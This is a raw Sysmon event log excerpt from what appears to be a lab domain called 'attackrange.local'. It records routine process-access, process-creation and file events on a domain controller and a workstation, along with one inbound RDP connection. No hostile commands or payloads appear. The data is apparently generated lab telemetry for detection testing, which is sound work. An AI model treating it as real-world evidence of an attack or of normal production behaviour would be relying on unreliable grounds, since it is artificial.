09:22:46.779{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056367Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:46.779{5EBD8912-8CBD-6151-0500-00000000FD01}416432C:\Windows\system32\csrss.exe{5EBD8912-8D66-6151-AB00-00000000FD01}5876C:\Windows\SysWOW64\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001056366Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:46.779{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8D66-6151-AB00-00000000FD01}5876C:\Windows\SysWOW64\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+366e9|c:\windows\system32\rpcss.dll+3bed2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001056365Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:46.791{5EBD8912-8D66-6151-AB00-00000000FD01}5876C:\Windows\SysWOW64\dllhost.exe10.0.14393.0 (rs1_release.160715-1616)COM SurrogateMicrosoft® Windows® Operating SystemMicrosoft Corporationdllhost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}C:\Windows\system32\ATTACKRANGE\Administrator{5EBD8912-8D28-6151-085E-080000000000}0x85e082HighMD5=6046950FC9CA5B7A7E084C189658DACB,SHA256=5137C324038AB2E8EAB4F98A20BEE9F121346D62E4D907CA1E4A860F4C54EAE8,IMPHASH=EC90A0D780E0DD23BA7910ABD6BF7E32{5EBD8912-8CBF-6151-0C00-00000000FD01}844C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 23542300x80000000000000001056364Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:46.733{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1B72CA9BA96CE75304808D26F618DF94,SHA256=7EC80174F5E545D4A8527883A431BFBFCAB96127C2DCCD33BB7C38EB2F1106AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056363Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:46.733{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=236A07B2E9574AFCE7654991245F0D4B,SHA256=6A9A3664C3BFD020E59CA1BBD3F0E56507DCE31837D1D6FA6194A85424494AF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056362Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:46.217{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56F98FAA6EC66433E3392DB6B82297D6,SHA256=5EE91E31267021A20C33A1C824575921DB96F38C5E8AEF6824D1A5A2A2B38625,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981089Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:46.399{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=629E502F7364A31D8BB3C3441008ED6A,SHA256=3EA92FFA5C27F99C28C2DBC408DB7781977A91287F7E98EFD1F5FB762BD39CC5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981088Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:46.211{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=523871DAEDF4530CB1BCF57C07E2518F,SHA256=932198065A88BD1BBFBDF607BAD499667E5F4D8A445B193953756BAFEA2A047F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981087Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:43.508{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-50309-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000981090Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:47.305{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B4A2C9F1FFDD694E301239AFDFED1CB3,SHA256=51F5CDF0177813DFFA6A56FAB3748EBF8E704D42339495701F9366D887BD0FA3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001056423Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:47.967{5EBD8912-8D29-6151-8C00-00000000FD01}34084044C:\Windows\System32\RuntimeBroker.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+76e7a|C:\Windows\System32\combase.dll+6dc4d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+129f|C:\Windows\System32\combase.dll+3b283|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001056422Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:47.967{5EBD8912-8D29-6151-8C00-00000000FD01}34084044C:\Windows\System32\RuntimeBroker.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+76e7a|C:\Windows\System32\combase.dll+6dc4d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+129f|C:\Windows\System32\combase.dll+3b283|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001056421Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:47.967{5EBD8912-8D2A-6151-9600-00000000FD01}46324580C:\Windows\Explorer.EXE{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+15bf06|C:\Windows\System32\TwinUI.dll+83087|C:\Windows\System32\TwinUI.dll+bb7be|C:\Windows\System32\TwinUI.dll+bb789|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056420Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:47.967{5EBD8912-8D2A-6151-9600-00000000FD01}46324580C:\Windows\Explorer.EXE{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+15bf06|C:\Windows\System32\TwinUI.dll+83087|C:\Windows\System32\TwinUI.dll+bb7be|C:\Windows\System32\TwinUI.dll+bb789|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056419Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:47.936{5EBD8912-8D29-6151-8C00-00000000FD01}34084044C:\Windows\System32\RuntimeBroker.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+76e7a|C:\Windows\System32\combase.dll+6dc4d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+129f|C:\Windows\System32\combase.dll+3b283|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001056418Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:47.936{5EBD8912-8D29-6151-8C00-00000000FD01}34084044C:\Windows\System32\RuntimeBroker.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+76e7a|C:\Windows\System32\combase.dll+6dc4d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+129f|C:\Windows\System32\combase.dll+3b283|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x80000000000000001056417Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:47.936{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+b6c18|C:\Windows\System32\TwinUI.dll+b7777|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+37c8f|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+34376|C:\Windows\System32\combase.dll+33b2a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001056416Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:47.936{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+b6c18|C:\Windows\System32\TwinUI.dll+b7777|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+37c8f|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+34376|C:\Windows\System32\combase.dll+33b2a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001056415Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:47.936{5EBD8912-8D2A-6151-9600-00000000FD01}46324792C:\Windows\Explorer.EXE{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62f15|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056414Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:47.936{5EBD8912-8D2A-6151-9600-00000000FD01}46324792C:\Windows\Explorer.EXE{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e2e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056413Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:47.920{5EBD8912-8CD0-6151-2C00-00000000FD01}24243128C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\tileobjserver.dll+bce2|c:\windows\system32\tileobjserver.dll+26da2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001056412Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:47.920{5EBD8912-8D2A-6151-9600-00000000FD01}46324792C:\Windows\Explorer.EXE{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056411Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:47.920{5EBD8912-8CD0-6151-2C00-00000000FD01}24243128C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|c:\windows\system32\tileobjserver.dll+bc8f|c:\windows\system32\tileobjserver.dll+26da2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a 10341000x80000000000000001056410Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:47.920{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a384|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056409Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:47.920{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056408Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:47.920{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056407Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:47.920{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 